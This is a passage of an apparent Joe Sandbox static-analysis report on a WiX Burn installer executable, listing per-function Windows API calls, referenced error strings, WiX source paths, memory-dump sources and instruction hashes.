                                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,200001A4,00000000,00000000,00000000,200001A4,?,0090B002,00000000), ref: 00944D02
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00000000,00000000,00000001,00979150,00000000,?,0090B002,00000000), ref: 00944D2A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get CLSID for Microsoft.Update.AutoUpdate., xrefs: 00944D0E
                                                                                                                                                                                                                                                                            • Microsoft.Update.AutoUpdate, xrefs: 00944CFD
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\wuautil.cpp, xrefs: 00944D42
                                                                                                                                                                                                                                                                            • Failed to create instance of Microsoft.Update.AutoUpdate., xrefs: 00944D36
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateFromInstanceProg
                                                                                                                                                                                                                                                                            • String ID: Failed to create instance of Microsoft.Update.AutoUpdate.$Failed to get CLSID for Microsoft.Update.AutoUpdate.$Microsoft.Update.AutoUpdate$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\wuautil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2151042543-594154128
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008E6BE8
                                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(00000000,000000B0,00000000,000000B0,00000000,00000000,000000FF,000000B0,000000B0,00000000,00000010,00000000), ref: 008E6DBC
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008E6DCB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCriticalDeleteErrorHandleLastSection
                                                                                                                                                                                                                                                                            • String ID: Failed to create semaphore for queue.$d:\a\wix4\wix4\src\burn\engine\engine.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 596325006-972025716
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0094C4FB,0094C6A4), ref: 0094C497
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0094C4AD
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0094C4C2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                                                                                                                            • API String ID: 667068680-1718035505
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(009260E3,?,00000000,?,009260E3,00000000), ref: 00926100
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(0CC2C95B,?,00000000,?,009260E3,00000000), ref: 00926110
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(EC8B5500,?,00000000,?,009260E3,00000000), ref: 00926121
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(08758B56,?,00000000,?,009260E3,00000000), ref: 00926132
                                                                                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(5974F685,00000000,?,009260E3,00000000), ref: 00926144
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle$FileUnmapView
                                                                                                                                                                                                                                                                            • String ID: .Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 260491571-727612987
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,009298B1,009296CC,00927194), ref: 009298C8
                                                                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009298D6
                                                                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009298EF
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,009298B1,009296CC,00927194), ref: 00929941
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(008E7D5B,WixBundleOriginalSource,?,?,008FF8B4,8D4BE800,WixBundleOriginalSource,?,00000001,00000081,008E7D5B,?,00000001,008E7DDB,?,?), ref: 008EA8AF
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(008E7D5B,008E7D5B,00000000,00000000,?,?,008FF8B4,8D4BE800,WixBundleOriginalSource,?,00000001,00000081,008E7D5B,?,00000001,008E7DDB), ref: 008EA934
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • WixBundleOriginalSource, xrefs: 008EA8AB
                                                                                                                                                                                                                                                                            • Failed to get value as string for variable: %ls, xrefs: 008EA912
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008EA924
                                                                                                                                                                                                                                                                            • Failed to get value of variable: %ls, xrefs: 008EA8E9
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-3124624316
                                                                                                                                                                                                                                                                            • Opcode ID: 55f4a563effd42d2a31ec7169e0d97ad75be3ad26371ba93c2fc4a059b2e65f8
                                                                                                                                                                                                                                                                            • Instruction ID: 592595e71b1816333883932d3ef4d5ef4707e5d7616a89f4b4dbf9e9093ae7e1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55f4a563effd42d2a31ec7169e0d97ad75be3ad26371ba93c2fc4a059b2e65f8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26010835A41269FBCF215F51CC09F9E3E68FF02B65F114020FD14E91A1D3B5AA109791
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000001,024B6805,000000FF,comres.dll,000000FF,00000000,?,00000000,00000000,comres.dll,wininet.dll,00000000,008E6DEA,00000000,FF1C4389), ref: 00900207
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed dependents check on package provider: %ls$comres.dll$d:\a\wix4\wix4\src\burn\engine\dependency.cpp$wininet.dll
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-2816589420
                                                                                                                                                                                                                                                                            • Opcode ID: 438074ee4fdaad1290e2614bc8bad86b2dbb8e1e2c0d5b602fa1bceeae68e4de
                                                                                                                                                                                                                                                                            • Instruction ID: d3c6156161364a0f9e160f4a89b5618808e306b010ef401d137050bfd73f8d6c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 438074ee4fdaad1290e2614bc8bad86b2dbb8e1e2c0d5b602fa1bceeae68e4de
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE518330A05616EFCB18DF98C888BAEBBB9FF85714F104219E5659B281C3709991CFD1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,Resume,00000000,?,?,00000001,?,00000000,00000000,00000024,?,?,?,00905E95,000000F8), ref: 008F8317
                                                                                                                                                                                                                                                                              • Part of subcall function 0093CCD3: RegQueryValueExW.ADVAPI32(?,?,?,008F828D,?,Resume,00000000,?,?,00000001,?,00000000,00000000,00000024), ref: 0093CD06
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 008F825C
                                                                                                                                                                                                                                                                            • Resume, xrefs: 008F8280
                                                                                                                                                                                                                                                                            • Failed to open registration key., xrefs: 008F824A
                                                                                                                                                                                                                                                                            • Failed to read Resume value., xrefs: 008F82AE
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseQueryValue
                                                                                                                                                                                                                                                                            • String ID: Failed to open registration key.$Failed to read Resume value.$Resume$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3356406503-1502274520
                                                                                                                                                                                                                                                                            • Opcode ID: 4f096ba177a1cb18f982e91b1f437bed52d925ba12b49a4bb6a1a4986e21ba22
                                                                                                                                                                                                                                                                            • Instruction ID: 06358c04f2213c5cfc3d69817d2c8d909d6146376604d18e9f98547fea2bef82
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f096ba177a1cb18f982e91b1f437bed52d925ba12b49a4bb6a1a4986e21ba22
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7E31B231640A1DEBD7228EB9CC4ABBA7B64FF45714F114165FE01EB360DA71AE40D750
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0093CBC2: RegOpenKeyExW.KERNELBASE(?,0093CBBE,00000000,00000000,00000003,00000000,?,?,00946603,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 0093CBED
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00020019,?,?,008E6E9A,00000001,008E6DEA), ref: 00947376
                                                                                                                                                                                                                                                                              • Part of subcall function 009471E2: RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,008E6E9A,?,00020019,?,00000000,00000000,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,?,?), ref: 0094728C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 009472C5
                                                                                                                                                                                                                                                                            • Failed to enumerate uninstall key for related bundles., xrefs: 0094738C
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp, xrefs: 00947308
                                                                                                                                                                                                                                                                            • Failed to open uninstall registry key., xrefs: 009472F9
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close$Open
                                                                                                                                                                                                                                                                            • String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2976201327-4270664815
                                                                                                                                                                                                                                                                            • Opcode ID: afa1abd1518901facce974a2fe825639b088952ec590384564daf0a20cea1f2f
                                                                                                                                                                                                                                                                            • Instruction ID: fcb58542b26ed9be524507779f941ec14926d03e39b3bccaebec332ac5177121
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: afa1abd1518901facce974a2fe825639b088952ec590384564daf0a20cea1f2f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A21F232E4822DFADB219EE59C46F9EFAACEB44700F154461BE11BA051D3B58E40AB90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memcpy_s
                                                                                                                                                                                                                                                                            • String ID: Failed to ensure buffer size.$Failed to get string size.$Failed to write string to buffer: '%ls', error: %d$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\buffutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2001391462-4099103365
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Failed to get full path for: %ls$Failed to get parent directory for path: %ls$Full path was not rooted: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-281674368
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000001,55000CC2,000000FF,FFBC8CE8,000000FF,008E6CF2,5600950C,F685F08B,00000000,00000000,008E721E,008E7222,008E7162,00000000,008E6DEA), ref: 00900AFF
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000001,8351EC8B,000000FF,FFBC8CE8,000000FF,008E6CF2,5600950C,F685F08B,00000000,00000000,008E721E,008E7222,008E7162,00000000,008E6DEA), ref: 00900B2B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\dependency.cpp, xrefs: 00900A61
                                                                                                                                                                                                                                                                            • Failed to detect provider key bundle id., xrefs: 00900A4F
                                                                                                                                                                                                                                                                            • Failed dependents check on bundle., xrefs: 00900AAE
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed dependents check on bundle.$Failed to detect provider key bundle id.$d:\a\wix4\wix4\src\burn\engine\dependency.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-872169753
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memcpy_s
                                                                                                                                                                                                                                                                            • String ID: Failed to ensure buffer size.$Failed to get string size.$Failed to write string to buffer: '%hs', error: %d$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\buffutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2001391462-3750679403
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0093BCD0
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0093BCDA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastLookupPrivilegeValue
                                                                                                                                                                                                                                                                            • String ID: Failed to get privilege LUID: %ls$Failed to get token privilege information.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2626710698-2191672025
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?), ref: 0090FCBA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to detect dependencies for related bundle., xrefs: 0090FD50
                                                                                                                                                                                                                                                                            • Failed to ensure there is space for related bundles., xrefs: 0090FCE5
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\relatedbundle.cpp, xrefs: 0090FD30, 0090FD62
                                                                                                                                                                                                                                                                            • Failed to initialize package from related bundle id: %ls, xrefs: 0090FD1E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to detect dependencies for related bundle.$Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$d:\a\wix4\wix4\src\burn\engine\relatedbundle.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-344177745
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(0094E860,000000FF), ref: 009262B4
                                                                                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(0094E860), ref: 009262E2
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000), ref: 009262EB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate buffer.$d:\a\wix4\wix4\src\burn\engine\netfxchainer.cpp
                                                                                                                                                                                                                                                                            • API String ID: 944053411-1881421891
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,00000000,?,008E9840,008E9840,?,008E8154,?,?,00000000), ref: 008E8342
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008E8154,?,?,00000000,?,00000000,008E9840,?,008EB468,?,?,?,?,?), ref: 008E8371
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareErrorLastString
                                                                                                                                                                                                                                                                            • String ID: Failed to compare strings.$d:\a\wix4\wix4\src\burn\engine\variable.cpp$version.dll
                                                                                                                                                                                                                                                                            • API String ID: 1733990998-1162684775
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WaitForMultipleObjects.KERNEL32(?,?,000000FF,00000000,00000000,?,?,0090EC52,00000002,000000FF,00000000,000000FF,?,?,00000000), ref: 008E1673
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MultipleObjectsWait
                                                                                                                                                                                                                                                                            • String ID: Abandoned wait for multiple objects, index: %u.$Failed to wait for multiple objects.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 862713236-4067188417
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 008E9893
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,008E6E9A,00000001,008E6DEA,?,?,?,00947562,00000000), ref: 0093BFE1
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetProcAddress.KERNEL32(00000000), ref: 0093BFE8
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetLastError.KERNEL32(?,?,?,00947562,00000000), ref: 0093C010
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008E9938
                                                                                                                                                                                                                                                                            • Failed to set system folder variant value., xrefs: 008E9926
                                                                                                                                                                                                                                                                            • Failed to get 32-bit system folder., xrefs: 008E98D7, 008E98FF
                                                                                                                                                                                                                                                                            • Failed to get 64-bit system folder., xrefs: 008E98B8
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 896058289-2644686703
                                                                                                                                                                                                                                                                            • Opcode ID: 8bad6c356e38c23b6a4dd915635e91bdee0efa86d0f6f08ab60078871a54f9b5
                                                                                                                                                                                                                                                                            • Instruction ID: 799ca4a1c3a2e30124f1910be22dbe986371e3b7430330b2a68ab293743b3da7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8bad6c356e38c23b6a4dd915635e91bdee0efa86d0f6f08ab60078871a54f9b5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08210731E406A5B6CB22E697CC0AF8F7D68FF92B50F114165F984FA1C2E6F09A009691
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            • CreateWellKnownSid.ADVAPI32(001F01FF,00000000,00000000,?,00000044,00000001,00000000,008FD5FB,?,?,?,008FD2F1,001F01FF,008FD617,00000000,00000000), ref: 008FC5A2
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,008FD2F1,001F01FF,008FD617,00000000,00000000,?,008FD5FB,0000001A,001F01FF,?,00000000,00000000,?), ref: 008FC5AC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
